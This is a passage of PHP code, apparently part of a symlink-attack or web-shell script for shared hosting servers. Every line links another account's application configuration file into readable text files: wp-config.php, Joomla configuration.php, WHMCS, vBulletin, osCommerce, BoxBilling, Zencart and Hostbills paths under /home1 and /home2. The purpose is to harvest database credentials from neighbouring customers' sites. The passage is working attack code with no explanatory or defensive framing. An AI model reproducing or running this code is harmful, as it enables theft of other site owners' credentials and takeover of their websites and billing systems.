  1541. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1542. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1543. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1544. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1545. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1546. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1547. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1548. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1549. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1550. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1551. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1552. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1553. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1554. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1555. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1556. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1557. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1558. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1559. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1560. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1561. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1562. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1563. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1564. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1565. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1566. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1567. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1568. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1569. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1570. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1571. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1572. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1573. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1575. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1576. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1577. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1578. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1579. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1580. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1581. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1582. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1583. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1584. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1585. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1586. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1641. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1642. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1643. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1644. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1645. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1646. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1647. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1648. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1649. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1650. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1651. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1652. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1653. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1654. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1655. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1656. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1657. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1658. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1659. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1660. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1661. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1662. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1663. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1664. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1665. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1666. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1679. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1680. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1681. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1682. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1683. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1684. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1685. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1686. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1687. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1688. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1689. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1690. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1691. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1692. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1693. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1694. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1695. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1696. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1697. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1698. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1699. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1700. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1701. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1702. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1703. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1704. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1705. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1706. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1707. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1708. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1709. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1710. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1711. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1712. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1713. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1714. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1715. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1716. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1717. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1718. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1719. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1720.  
  1721. //Home2
  1722.  
  1723. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1724. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1725. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1726. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1727. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1728. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1729. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1730. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1731. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1732. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1733. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1734. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1735. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1736. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1737. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1738. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1739. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1740. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1741. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1742. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1743. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1744. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1745. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1746. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1747. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1748. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1749. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1750. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1751. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1752. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1753. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1754. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1755. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1756. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1757. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1758. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1759. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1760. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1761. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1762. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1763. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1764. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1765. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1766. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1767. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1768. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1769. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1825. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1826. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1827. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1828. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1829. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1830. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1831. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1832. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1833. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1834. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1835. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1836. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1837. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1838. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1839. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1840. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1841. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1842. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1843. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1844. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1845. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1846. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
